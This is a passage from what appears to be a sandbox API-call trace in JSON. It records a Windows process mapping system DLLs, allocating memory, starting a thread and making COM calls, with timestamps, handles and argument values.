"api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 145 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 146 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000300" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 147 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000032c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 148 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 149 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "SectionOffset", "value": "0x3f6827bbf0" }, { "name": "ViewSize", "value": "0x00003000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 150 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 151 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "wldp.dll" }, { "name": "BaseAddress", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 152 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 153 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0500000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 154 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "RegionSize", "value": "0x00003000" } ], "repeated": 0, "id": 155 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 156 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\SECURITY" }, { "name": "DllBase", "value": "0x21e2c090000" } ], "repeated": 0, "id": 157 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "SECURITY.DLL" }, { "name": "BaseAddress", "value": "0x21e2c090000" } ], "repeated": 0, "id": 158 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\secur32.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 159 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000334" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed5070000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0000c000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 160 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\SECUR32" }, { "name": "DllBase", "value": "0x7ffed5070000" } ], "repeated": 0, "id": 161 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b8c2000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 162 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\schannel" }, { "name": "DllBase", "value": "0x7ffedfaa0000" } ], "repeated": 0, "id": 163 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\schannel.dll" }, { "name": "BaseAddress", "value": "0x7ffedfaa0000" } ], "repeated": 0, "id": 164 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba2c000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 165 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "threading", "api": "CreateRemoteThreadEx", "status": true, "return": "0x00000384", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "StartRoutine", "value": "0x7ffec381d930" }, { "name": "Parameter", "value": "0x7ffec3a04460" }, { "name": "CreationFlags", "value": "0x00000000" }, { "name": "ThreadId", "value": "4388" }, { "name": "ProcessId", "value": "3164" } ], "repeated": 0, "id": 166 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0a0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 167 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba2e000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 168 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000394" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\tzres.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 169 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x00000398" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0a0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00003000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 170 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000394" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\tzres.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 171 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000398" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0b0000" }, { "name": "SectionOffset", "value": "0x3f6827b400" }, { "name": "ViewSize", "value": "0x0000b000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 172 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0b0000" }, { "name": "RegionSize", "value": "0x0000b000" } ], "repeated": 0, "id": 173 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0a0000" }, { "name": "RegionSize", "value": "0x00003000" } ], "repeated": 0, "id": 174 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000394" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\tzres.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 175 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x00000398" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0a0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00003000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 176 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000394" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\tzres.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 177 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000398" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0b0000" }, { "name": "SectionOffset", "value": "0x3f6827b400" }, { "name": "ViewSize", "value": "0x0000b000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 178 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0b0000" }, { "name": "RegionSize", "value": "0x0000b000" } ], "repeated": 0, "id": 179 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c0a0000" }, { "name": "RegionSize", "value": "0x00003000" } ], "repeated": 0, "id": 180 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 181 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba31000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 182 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffed3fea3b7", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 183 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 184 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba33000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 185 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee2f66d2f", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000398" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 186 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 187 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffee2fc0030", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 188 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aafd767", "parentcaller": "0x7ff79aaf8fab", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba35000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 189 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4590F812-1D3A-11D0-891F-00AA004B2E24" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 190 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba36000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 191 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "NTDLL.DLL" }, { "name": "BaseAddress", "value": "0x7ffee3470000" } ], "repeated": 0, "id": 192 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c125000" }, { "name": "RegionSize", "value": "0x00009000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 193 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c12e000" }, { "name": "RegionSize", "value": "0x00011000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 194 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c125000" }, { "name": "RegionSize", "value": "0x00019000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 195 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c13f000" }, { "name": "RegionSize", "value": "0x00021000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 196 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba3c000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 197 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba3f000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 198 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba42000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 199 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": 